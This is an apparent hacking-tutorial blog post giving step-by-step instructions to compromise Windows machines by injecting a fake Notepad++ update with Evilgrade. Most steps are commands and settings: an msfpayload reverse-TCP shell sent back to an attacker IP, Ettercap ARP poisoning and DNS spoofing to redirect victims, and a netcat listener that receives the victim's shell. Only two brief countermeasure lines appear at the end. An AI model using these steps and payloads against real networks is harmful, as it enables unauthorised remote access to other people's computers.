• +
15 Steps to Hacking Windows Using Evilgrade 2.0 on Backtrack 5

15 Steps to Hacking Windows Using Evilgrade 2.0 on Backtrack 5

Bookmark

Type : Tutorial

Level : Medium, Advanced

What is Evilgrade?

Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it’s own WebServer and DNSServer modules. Easy to set up new settings, and has an autoconfiguration when new binary agents are set.

From : http://www.infobytesec.com

Requirement :

1. Evilgrade

2. Backtrack 5

15 Steps to Hacking Windows Using Evilgrade 2.0 on Backtrack 5 :

1. Extract Evilgrade then run it using the command below

tar xvfz isr-evilgrade-2.0.0.tar.gz

cd isr-evilgrade-2.0.0.tar.gz/

./evilgrade

If there’s an error when you run the application, you can refer to my post about how to solve evilgrade error on Backtrack 5. below is the picture if you success run the application :

Hacking using Evilgrade on Backtrack 5

2. The next step is you need to determine the target of the application, because Evilgrade will create a fake update to inject the victim computer. To list all the supported application use

evilgrade>show modules
List of modules:
===============

allmynotes
amsn
appleupdate
apptapp
apt
atube
autoit3
bbappworld
blackberry
bsplayer
ccleaner
clamwin
cpan
cygwin
dap
divxsuite
express_talk
fcleaner
filezilla
flashget
flip4mac
freerip
getjar
gom
googleanalytics
growl
isopen
istat
itunes
jet
jetphoto
linkedin
miranda
mirc
nokia
nokiasoftware
notepadplus
openoffice
opera
orbit
osx
paintnet
panda_antirootkit
photoscape
quicktime
skype
sparkle
speedbit
sunbelt
sunjava
superantispyware
teamviewer
techtracker
trillian
ubertwitter
vidbox
virtualbox
vmware
winamp
winscp
winupdate
winzip
yahoomsn
- 63 modules available.

In this tutorial we will targeting user who use Notepad Plus, so when they’re updating their application automatically it will caught in my trap. To use modules, simply run

evilgrade>configure notepadplus

3. To view the options that you can set up use command show options.

15 Steps to Hacking Windows Using Evilgrade 2.0 on Backtrack 5

in the image above there’s VirtualHost that means when the victim update their notepad plus it will opening URL notepad-plus.sourceforge.net. later we will use this address.

4. The next step is setting an agent. I’m configuring this agent to create shell_reverse_tcp using msfpayload.

evilgrade(notepadplus)>set agent ’["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.8.91 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]’

Explanation:

/pentest/exploits/framework3/msfpayload –> We will load the msfpayload.

windows/shell_reverse_tcp –> We will use windows shell reverse tcp payload to open shell on target when operation succeeded.

LHOST –> localhost you backtrack 5 ip address / attacker ip address.

LPORT –> in which port you will interract with the victim when operation succedded. for further information about this you can refer to the readme file.

5. The next step is we need to start the evilgrade server. Make sure your port 80 is empty.

15 Steps to Hacking Windows Using Evilgrade 2.0 on Backtrack 5

6. After finish setting up Evilgrade, we also need to configure the Man in the Middle attack using Ettercap, then redirect the connection to Evilgrade server when someone updating their notepad plus application. First step is you need to configure etter.dns .

pico /usr/share/ettercap/etter.dns

15 Steps to Hacking Windows Using Evilgrade 2.0 on Backtrack 5

notepad-plus.sourceforge.net –> this address we get from no.3.

7. For the next step we will use Ettercap

"Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks.
It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis."
From : http://ettercap.sourceforge.net/

To run Ettercap, open new terminal(Ctrl+Alt+T) run this command

ettercap -G

Click Sniff –> Unified sniffing –> choose your network interface card, in this case I’m using eth0.

15 Steps to Hacking Windows Using Evilgrade 2.0 on Backtrack 5

8. The next step we need to enable dns_spoof plugin this plugin used to redirect the request from victim to Evilgrade server. Click Plugins –> Manage the plugins –> Double click dns_spoof

15 Steps to Hacking Windows Using Evilgrade 2.0 on Backtrack 5

9. The next step is scan hosts in our network, this step is to determine the target. Click Hosts –> Scan for hosts.

15 Steps to Hacking Windows Using Evilgrade 2.0 on Backtrack 5

10. After listing all the hosts in the network, we need to set up the target.

15 Steps to Hacking Windows Using Evilgrade 2.0 on Backtrack 5

11. We also need to perform Man in the middle attack to intercept all data on network. Click Mitm –> Arp poisoning –> check "Sniff remote connection".

15 Steps to Hacking Windows Using Evilgrade 2.0 on Backtrack 5

12. After everything is set up correctly run the Ettercap to start sniffing.

15 Steps to Hacking Windows Using Evilgrade 2.0 on Backtrack 5

13. The next step we will use NetCat to listen on port 1234 that we already defined before when setting up Evilgrade.

"Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.
It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities."

From : http://netcat.sourceforge.net/

Open new terminal(Ctrl+Alt+T) and run this command

nc -l -v -p 1234

Explanation :

-l : to listen on any incoming connection

-v : verbose

-p : port to listen on

14. When the user opening their Notepad Plus application and the application asking for update application automatically like the picture below and user answer YES.

15 Steps to Hacking Windows Using Evilgrade 2.0 on Backtrack 5

15. Our NetCat terminal will have something interesting because it’s already on victim shell.

15 Steps to Hacking Windows Using Evilgrade 2.0 on Backtrack 5

Countermeasure :

1. It’s better to download directly from the source than automatically update the application 🙂

2. Always update your antivirus

Hope it helps 🙂

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com